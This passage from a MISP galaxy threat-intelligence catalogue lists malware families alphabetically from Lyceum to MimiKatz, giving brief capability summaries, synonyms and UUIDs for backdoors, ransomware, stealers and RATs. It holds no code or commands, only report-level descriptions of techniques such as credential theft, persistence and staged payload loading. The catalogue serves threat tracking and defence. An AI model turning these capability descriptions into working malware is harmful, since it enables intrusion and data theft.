type	[]

Lyceum .NET TCP Backdoor

This .Net written malware is used as backdoor using the http protocol by a state sponsored threat actor. It implements additional capabilities (e.g. execution of commands, taking screenshots, listing diles/directories/installed applications, and uploading/downloading/execution of files). There are also variants using DNS (.Net) and also one written in Golang.

Internal MISP references

UUID 92e533c5-b32a-411a-9fcc-733854c4a18c which can be used as unique global reference for Lyceum .NET TCP Backdoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lyceum Golang HTTP Backdoor

This Golang written malware is used as backdoor using the http protocol by a state sponsored threat actor (TA). This backdoor is running in a loop of three stages: - Check the connectivity - Registration of the victim - Retrieval and execution of commands This TA is using also variants .NET backdoors utilizing HTTP and DNS.

Internal MISP references

UUID 61fda7db-5e82-4e8c-a629-e8cc36151dec which can be used as unique global reference for Lyceum Golang HTTP Backdoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lyposit

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lyposit.

Known Synonyms
`Adneukine`
`Bomba Locker`
`Lucky Locker`

Internal MISP references

UUID 0dea3e9d-b443-40f6-a9e0-ba622850ee8a which can be used as unique global reference for Lyposit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

M00nD3V Logger

According Zscaler, M00nD3V Logger has the ability to steal confidential information, such as browser passwords, FTP client passwords, email client passwords, DynDNS credentials, JDownloader credentials; capture Windows keystrokes; and gain access to the webcam and hook the clipboard. In all, it has the ability to steal passwords from 42 applications.

Internal MISP references

UUID 737a73d5-40a2-4779-a84b-bdbefd1af4c9 which can be used as unique global reference for M00nD3V Logger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

m0yv

Modular x86/x64 file infector created/used by Maze ransomware developer. According to the author, it has been mistakenly tagged by AVs as Expiro.

Internal MISP references

UUID 73db5c33-c05c-4835-af4d-9223516b0915 which can be used as unique global reference for m0yv in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MACAMAX

Internal MISP references

UUID 94dce4b9-69c9-4cc3-8377-dba04a162bc4 which can be used as unique global reference for MACAMAX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Macaw

Internal MISP references

UUID 523883ea-b865-4713-b5ed-bb1a808f35cf which can be used as unique global reference for Macaw in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Machete

According to ESET, Machete’s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64‑encoded text that corresponds to AES‑encrypted strings. GoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence. Regarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it’s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL. The GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Machete.

Known Synonyms
`El Machete`

Internal MISP references

UUID 9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff which can be used as unique global reference for Machete in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MadMax

Internal MISP references

UUID 42760c2c-bf00-4ace-871c-6dcbbd90b2de which can be used as unique global reference for MadMax in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax - webarchive

Associated metadata

Metadata key	Value
type	[]

Magala

Internal MISP references

UUID 192f93bc-fcf6-4aaf-ae2f-d9435a67e48b which can be used as unique global reference for Magala in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Maggie

According to DCSO, this malware is written as a Extended Stored Procedure for a MSSQL server. The backdoor has capabilities to bruteforce logins to other MSSQL servers, adding a special hardcoded backdoor user in the case of successfully bruteforcing admin logins.

Internal MISP references

UUID 2e4a63ab-9a04-472f-aad0-3eb4835a4697 which can be used as unique global reference for Maggie in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MagicRAT

According to Talos, MagicRAT is programmed in C++ programming language and uses the Qt Framework by statically linking it to the RAT on 32- and 64-bit versions. The Qt Framework is a programming library for developing graphical user interfaces, of which this RAT has none. Talos thinks that the objective was to increase the complexity of the code, thus making human analysis harder. On the other hand, since there are very few examples (if any) of malware programmed with Qt Framework, this also makes machine learning and heuristic analysis detection less reliable. The RAT uses the Qt classes throughout its entire code. The configuration is dynamically stored in a QSettings class eventually being saved to disk, a typical functionality provided by that class.

MagicRAT provides the operator with a remote shell on the victim's system for arbitrary command execution, along with the ability to rename, move and delete files on the endpoint. The operator can determine the timing for the implant to sleep, change the C2 URLs and delete the implant from the infected system.

Internal MISP references

UUID ace607fa-d2ad-4097-aa01-0aa748644b8e which can be used as unique global reference for MagicRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Magniber

According to TXOne, The Magniber ransomware was first identified in late 2017 when it was discovered using the Magnitude Exploit Kit to conduct malvertising attacks against users in South Korea. However, it has remained active since then, continually updating its tactics by employing new obfuscation techniques and methods of evasion. In April 2022, Magniber gained notoriety for disguising itself as a Windows update file to lure victims into installing it. It then began spreading via JavaScript in September 2022.

Internal MISP references

UUID fedac411-0638-48dc-8ac5-1b4171fa8a29 which can be used as unique global reference for Magniber in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mailto

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mailto.

Known Synonyms
`Koko Ransomware`
`NetWalker`

Internal MISP references

UUID 722aab64-a02a-40fc-8c05-6b0344fad9b8 which can be used as unique global reference for Mailto in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mail-O

Internal MISP references

UUID d41f513c-97e2-4588-a669-aa93b6378ef1 which can be used as unique global reference for Mail-O in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MajikPos

Internal MISP references

UUID c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9 which can be used as unique global reference for MajikPos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Makadocs

Internal MISP references

UUID 996e73e9-b093-4987-9992-f52008e55b24 which can be used as unique global reference for Makadocs in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MakLoader

Internal MISP references

UUID 7e088669-3ddb-4cc5-bc9b-ae59f61ada82 which can be used as unique global reference for MakLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Makop

BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension “.makop”. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.

Internal MISP references

UUID db4ca498-5481-4b68-8024-edd51d552c38 which can be used as unique global reference for Makop in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Maktub

According to PCrisk, Maktub is ransomware distributed via zipped Word documents. Once the file is extracted and opened, Maktub infiltrates the system and encrypts files stored on the victim's computer. Maktub ransomware adds a .NORV, .gyul (or other random) extension to each file encrypted, thus, making it straightforward to determine which files are encrypted.

Internal MISP references

UUID bdb27944-1f79-46f7-a0d7-c344429790c2 which can be used as unique global reference for Maktub in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MalumPOS

Internal MISP references

UUID 159b0dbf-52f6-4690-a545-0f890ba7b9b7 which can be used as unique global reference for MalumPOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mamba

According to PCrisk, Mamba is an updated variant of high-risk ransomware called Phobos. After successful infiltration, Mamba encrypts stored files and appends filenames with the ".mamba" extension plus the victim's unique ID and developer's email address.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mamba.

Known Synonyms
`DiskCryptor`
`HDDCryptor`

Internal MISP references

UUID df320366-7970-4af0-b1f4-9f9492dede53 which can be used as unique global reference for Mamba in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ManameCrypt

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ManameCrypt.

Known Synonyms
`CryptoHost`

Internal MISP references

UUID 54cd671e-b7e4-4dd3-9bfa-dc0ba5105944 which can be used as unique global reference for ManameCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mango

Internal MISP references

UUID e3be5820-5cf9-4455-9b46-c88e7fbebd85 which can be used as unique global reference for Mango in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mangzamel

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mangzamel.

Known Synonyms
`junidor`
`mengkite`
`vedratve`

Internal MISP references

UUID ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0 which can be used as unique global reference for Mangzamel in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Manifestus

Internal MISP references

UUID 5b75db42-b8f2-4e52-81d3-f329e49e1af2 which can be used as unique global reference for Manifestus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ManItsMe

Internal MISP references

UUID 13b0d9ff-0be0-4539-8c86-dfca7a0e79f6 which can be used as unique global reference for ManItsMe in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Manjusaka (Windows)

Cisco Talos compared this RAT to Cobalt Strike and Sliver. Written in Rust.

Internal MISP references

UUID 402a569c-6fc1-4ba3-b570-f85ce7538eef which can be used as unique global reference for Manjusaka (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Maoloa

Ransomware family closely related to GlobeImposter, notable for its use of SHACAL-2 encryption algorithm.

Internal MISP references

UUID 9fe92a48-6822-4ec0-b52b-d089f98590ec which can be used as unique global reference for Maoloa in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MAPIget

Internal MISP references

UUID 8a97307f-a029-4c43-88e1-debed2b80b14 which can be used as unique global reference for MAPIget in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Marap

Marap is a downloader, named after its command and control (C&C) phone home parameter "param" spelled backwards. It is written in C and contains a few notable anti-analysis features.

Internal MISP references

UUID c2c3ac24-6921-4bba-a2c8-ac3d364feaeb which can be used as unique global reference for Marap in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mariposa

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mariposa.

Known Synonyms
`Autorun`
`Palevo`
`Rimecud`

Internal MISP references

UUID 6adb6fa0-1974-4d24-9c39-e76d5356cf6a which can be used as unique global reference for Mariposa in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MarkiRAT

Internal MISP references

UUID c19ac191-a881-437f-ae82-7bec174590cb which can be used as unique global reference for MarkiRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MarraCrypt

Internal MISP references

UUID bbe77240-d8e5-41b5-88ac-e9a91aa54a13 which can be used as unique global reference for MarraCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mars

Ransomware written in Delphi.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mars.

Known Synonyms
`MarsDecrypt`

Internal MISP references

UUID 0b71ab98-912a-47a5-a1e0-1d7bd4fe9a4e which can be used as unique global reference for Mars in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mars Stealer

3xp0rt describes Mars Stealer as an improved successor of Oski Stealer, supporting stealing from current browsers and targeting crypto currencies and 2FA plugins.

Internal MISP references

UUID a5c1a9bd-5c1c-4987-8844-2c38e7b83507 which can be used as unique global reference for Mars Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Masad Stealer

Internal MISP references

UUID 8a85df9f-5295-4570-948a-67c2489bdd2d which can be used as unique global reference for Masad Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MASS Logger

MassLogger is a .NET credential stealer. It starts with a launcher that uses simple anti-debugging techniques which can be easily bypassed when identified. This first stage loader eventually XOR-decrypts the second stage assembly which then decrypts, loads and executes the final MassLogger payload.

Internal MISP references

UUID e1a09bf8-974a-4cc4-9ffd-758bed7a785e which can be used as unique global reference for MASS Logger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Matanbuchus

According to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections.

Since it is used as a MaaS, both the malware it infiltrates into systems, and the attack reasons can vary - depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization.

Internal MISP references

UUID e30f2243-9e69-4b09-97ab-1643929b97ad which can be used as unique global reference for Matanbuchus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Matiex

Matiex Keylogger is being sold in the underground forums, due to their gained popularity, and can also be used as MaaS (Malware-as-a-service) because of their ease of use, competitive pricing and immediate response from support.

Internal MISP references

UUID b946f5d5-6503-471a-b3cd-c6c6d6149768 which can be used as unique global reference for Matiex in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Matrix Banker

Internal MISP references

UUID 59717468-271e-4d15-859a-130681c17ddb which can be used as unique global reference for Matrix Banker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Matrix Ransom

Matrix is a ransomware that encrypts a victim's files and demands a ransom in cryptocurrency to decrypt them. It is distributed through phishing emails, hacking toolkits, and software downloaders. Matrix is a serious threat and can cause significant damage to a victim's data.

Internal MISP references

UUID 118ced99-5942-497f-885a-2b25d0569b4b which can be used as unique global reference for Matrix Ransom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Matryoshka RAT

Internal MISP references

UUID c8a7c6e7-c6d3-4978-8a1d-190162de5e0d which can be used as unique global reference for Matryoshka RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Matsnu

Internal MISP references

UUID f566d597-d0c4-4932-b738-ac5774eedb7a which can be used as unique global reference for Matsnu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Maudi

Specialized PoisonIvy Sideloader.

Internal MISP references

UUID feb5ac55-7b28-47aa-9e9e-5007d838c0d5 which can be used as unique global reference for Maudi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Maui Ransomware

Internal MISP references

UUID 0a531358-f943-40f9-a41d-e5e7944a9619 which can be used as unique global reference for Maui Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Maxtrilha

Banking trojan written in Delphi, targeting customers of European and South American banks.

Internal MISP references

UUID 65799ce1-793d-4730-8d80-d829d7619dc6 which can be used as unique global reference for Maxtrilha in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Maze

Maze Ransomware encrypts files and makes them inaccessible while adding a custom extension containing part of the ID of the victim. The ransom note is placed inside a text file and an htm file. There are a few different extensions appended to files which are randomly generated.

Actors are known to exfiltrate the data from the network for further extortion. It spreads mainly using email spam and various exploit kits (Spelevo, Fallout).

The code of Maze ransomware is highly complicated and obfuscated, which helps to evade security solutions using signature-based detections.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Maze.

Known Synonyms
`ChaCha`

Internal MISP references

UUID 266c9377-34ef-4670-afa3-28bc0ba7f44e which can be used as unique global reference for Maze in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MBRlock

This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MBRlock.

Known Synonyms
`DexLocker`

Internal MISP references

UUID 41177275-7e6d-4ebd-a4df-d2cc733f7791 which can be used as unique global reference for MBRlock in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MBR Locker

Ransomware overwriting the system's MBR, making it impossible to boot into Windows.

Internal MISP references

UUID 1f7fc94c-218a-4571-85b6-5667544bf230 which can be used as unique global reference for MBR Locker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mebromi

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mebromi.

Known Synonyms
`MyBios`

Internal MISP references

UUID 342be00c-cf68-45a6-8f90-3a2d2d20bda6 which can be used as unique global reference for Mebromi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MECHANICAL

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MECHANICAL.

Known Synonyms
`GoldStamp`

Internal MISP references

UUID cd055701-89ad-41be-b4d9-69460876fdee which can be used as unique global reference for MECHANICAL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MediaPI

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MediaPI.

Known Synonyms
`Eyeglass`

Internal MISP references

UUID 3c111e49-957c-4bda-8c25-7be3e373b788 which can be used as unique global reference for MediaPI in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Medre

Internal MISP references

UUID 243ae1f7-183e-4ea9-82cf-3353a0ef78f4 which can be used as unique global reference for Medre in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Medusa (Windows)

Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC.

Internal MISP references

UUID 237a1c2d-eb14-483d-9a2e-82f10b63ec06 which can be used as unique global reference for Medusa (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MedusaLocker

A Windows ransomware that will run certain tasks to prepare the target system for the encryption of files. MedusaLocker avoids executable files, probably to avoid rendering the targeted system unusable for paying the ransom. It uses a combination of AES and RSA-2048, and reportedly appends extensions such as .encrypted, .bomber, .boroff, .breakingbad, .locker16, .newlock, .nlocker, and .skynet.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MedusaLocker.

Known Synonyms
`AKO Doxware`
`AKO Ransomware`
`MedusaReborn`

Internal MISP references

UUID 77e7221f-d3db-4d13-bcde-e6d7a494f424 which can be used as unique global reference for MedusaLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Meduza Stealer

Internal MISP references

UUID 20edd63e-d1a8-4aae-a0a6-50f5bb1cf65f which can be used as unique global reference for Meduza Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MegaCortex

Megacortex is a ransomware used in targeted attacks against corporations. Once the ransomware is run it tries to stop security related services and after that it starts its own encryption process adding a .aes128ctr or .megac0rtx extension to the encrypted files. It is used to be carried from downloaders and trojans, it has no own propagation capabilities.

Internal MISP references

UUID 3f09884e-dddc-4513-8720-a28fe21ab9a8 which can be used as unique global reference for MegaCortex in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MegaCreep

Internal MISP references

UUID 394ddd91-b673-4607-b253-fe19b98008b5 which can be used as unique global reference for MegaCreep in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MeguminTrojan

Megumin Trojan, is a malware focused on multiple fields (DDoS, Miner, Loader, Clipper).

Internal MISP references

UUID 76cd241a-c265-4a33-8ce7-db2d3647b489 which can be used as unique global reference for MeguminTrojan in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mekotio

Internal MISP references

UUID bfebb298-66e3-4250-82e8-910b7dd8618c which can be used as unique global reference for Mekotio in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Melcoz

Internal MISP references

UUID e3e289bb-3ac2-4f93-becd-540720501884 which can be used as unique global reference for Melcoz in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MeltingClaw

Internal MISP references

UUID f7b455fb-9774-41d4-8315-75192c3e3f4c which can be used as unique global reference for MeltingClaw in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Meow

According to PCrisk, MEOW is ransomware based on other ransomware called CONTI. MEOW encrypts files and appends the ".MEOW" extension to their filenames. It also drops the "readme.txt" file (a ransom note). An example of how MEOW ransomware modifies filenames: it renames "1.jpg" to "1.jpg.MEOW", "2.png" to "2.png.MEOW", and so forth.

Internal MISP references

UUID ee27ec81-3c41-4562-ae6b-58a7ce6f0485 which can be used as unique global reference for Meow in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MercurialGrabber

Internal MISP references

UUID 5fa45856-2960-47c4-ad73-df0ff142ae12 which can be used as unique global reference for MercurialGrabber in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Merdoor

Internal MISP references

UUID bf604927-77df-46e5-9bdb-ee9b631461a2 which can be used as unique global reference for Merdoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Merlin

Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.

Internal MISP references

UUID 427e4b41-adf6-4d4d-a83f-6d96b5ab4a3e which can be used as unique global reference for Merlin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mespinoza

Mespinosa is a ransomware which encrypts file using an asymmetric encryption and adds .pysa as file extension. According to dissectingmalware the extension "pysa" is probably derived from the Zanzibari Coin with the same name.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mespinoza.

Known Synonyms
`pysa`

Internal MISP references

UUID 68a7ca8e-2902-43f2-ad23-a77b4c48221d which can be used as unique global reference for Mespinoza in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MetadataBin

Ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MetadataBin.

Known Synonyms
`Ransomware32`

Internal MISP references

UUID 750c5b2c-1489-4e11-b21d-c49b651d9227 which can be used as unique global reference for MetadataBin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

METALJACK

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular METALJACK.

Known Synonyms
`denesRAT`

Internal MISP references

UUID 64304fcc-5bc8-4000-9be2-4fc7a482897a which can be used as unique global reference for METALJACK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Metamorfo

According to BitDefender, Metamorfo is a family of banker Trojans that has been active since mid-2018. It primarily targets Brazilians and is delivered mostly through Office files rigged with macros in spam attachments. Metamorfo is a potent piece of malware, whose primary capability is theft of banking information and other personal data from the user and exfiltration of it to the C2 server.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Metamorfo.

Known Synonyms
`Casbaneiro`

Internal MISP references

UUID 18dc3e7a-600d-4e5f-a283-86156b938530 which can be used as unique global reference for Metamorfo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MetaStealer

On March 7, 2022, KELA observed a threat actor named META announcing the launch of META – a new information-stealing malware, available for sale for USD125 per month or USD1000 for unlimited use. The actor claimed it has the same functionality, code, and panel as the Redline stealer, but with several improvements.

Internal MISP references

UUID 9b7758fc-2fca-4b07-b669-34461fc95a67 which can be used as unique global reference for MetaStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Meteor

A wiper used in an attack against the Iranian train system.

Internal MISP references

UUID 066250ee-9279-47ad-b289-e266ede11921 which can be used as unique global reference for Meteor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Meterpreter (Windows)

Internal MISP references

UUID 13a5c0ae-8e2d-4a38-8b6c-7d746e159991 which can be used as unique global reference for Meterpreter (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mevade

A botnet that used Tor .onion links for C&C.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mevade.

Known Synonyms
`SBC`
`Sefnit`

Internal MISP references

UUID 3454bd71-29e1-498b-82d8-111aeadedee5 which can be used as unique global reference for Mevade in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mewsei

Internal MISP references

UUID 48cb12ee-c60a-46cd-b376-39226027c616 which can be used as unique global reference for Mewsei in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei - webarchive

Associated metadata

Metadata key	Value
type	[]

MgBot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MgBot.

Known Synonyms
`BLame`
`MgmBot`
`POCOSTICK`

Internal MISP references

UUID d97c2c0c-ef3a-4512-846a-f4cdeee7787a which can be used as unique global reference for MgBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Miancha

Internal MISP references

UUID a3370013-6c47-422e-a4d4-1b86ee71e5e5 which can be used as unique global reference for Miancha in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha - webarchive

Associated metadata

Metadata key	Value
type	[]

Micrass

Internal MISP references

UUID 6c09cc53-7160-47c6-8df8-3e0d42deb5a6 which can be used as unique global reference for Micrass in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MicroBackdoor

Open-source lightweight backdoor for C2 communication. GitHub: https://github.com/Cr4sh/MicroBackdoor

Internal MISP references

UUID 07c7b7dc-cec8-4542-b351-ce7d757812d7 which can be used as unique global reference for MicroBackdoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Microcin

Internal MISP references

UUID 185d8b28-0179-4ec6-a3c8-201b1936b9aa which can be used as unique global reference for Microcin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Micropsia

This malware written in Delphi is an information stealing malware family dubbed "MICROPSIA". It has s wide range of data theft functionality built in.

Internal MISP references

UUID b37f312f-a0b1-41a9-88ae-da2844c19cae which can be used as unique global reference for Micropsia in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Midas

This malware written in C# is a variant of the Thanos ransomware family and emerged in October 2021 and is obfuscated using SmartAssembly. In 2022, ThreatLabz analysed a report of Midas ransomware was slowly deployed over a two month period (ZScaler). This ransomware features also its own data leak site as part of its double extortion strategy.

Internal MISP references

UUID e5043a7f-2c38-4015-978e-253a7cdbda97 which can be used as unique global reference for Midas in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mikoponi

Internal MISP references

UUID 87abb59d-0012-4d45-9e75-136372b25bf8 which can be used as unique global reference for Mikoponi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Milan

Internal MISP references

UUID 5b1fe92d-9a78-4543-8efb-7c674492d0d2 which can be used as unique global reference for Milan in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MILKMAID

Internal MISP references

UUID 801d8a6a-b7ba-4557-af5d-1005e53145e2 which can be used as unique global reference for MILKMAID in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Milum

In August 2019, Kaspersky Labs discovered a malware they dubbed Milum (naming based on internal file name fragments) when investigating an operation they named WildPressure. It is written in C++ using STL, primarily to parse JSON. Functionality includes bidirectional file transmission and remote command execution.

Internal MISP references

UUID d1942959-9c6f-462b-87bf-da6ed914669d which can be used as unique global reference for Milum in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

mim221

Internal MISP references

UUID 83ebded5-6ce5-471a-9bfe-db7cca6b3756 which can be used as unique global reference for mim221 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mimic Ransomware

According to PCrisk, Mimic is a ransomware-type program. Malware within this classification is designed to encrypt data and demand ransoms for decryption. Evidence suggests that Mimic is based on the leaked CONTI ransomware builder. Mimic campaigns have been observed targeting English and Russian speaking users.

Internal MISP references

UUID 40e57c70-c83b-4820-87fd-f684f4960268 which can be used as unique global reference for Mimic Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MimiKatz

Varonis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.

Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.

Internal MISP references

UUID 588fb91d-59c6-4667-b299-94676d48b17b which can be used as unique global reference for MimiKatz in MISP communities and other software using the MISP galaxy

External references

Associated metadata

